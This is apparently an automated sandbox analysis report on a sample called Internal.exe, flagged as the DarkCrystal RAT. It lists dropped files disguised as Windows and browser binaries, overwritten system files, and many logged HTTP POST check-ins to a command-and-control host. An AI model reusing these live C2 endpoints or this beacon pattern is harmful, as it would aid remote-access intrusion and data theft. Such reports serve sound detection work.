                                    Source: C:\Users\user\Desktop\RypOpByW.logJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\UjoVbfCg.logJoe Sandbox ML: detected
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\wekqfedd.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\mVSSSdRf.logJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
                                    Source: C:\Blockcomcrt\AgentMonitor.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: Internal.exeJoe Sandbox ML: detected
                                    Source: Internal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Internal.exe, Internal.exe, 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FA69B FindFirstFileW,FindFirstFileW,1_2_004FA69B
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49707 -> 80.211.144.156:80
                                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 152740Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
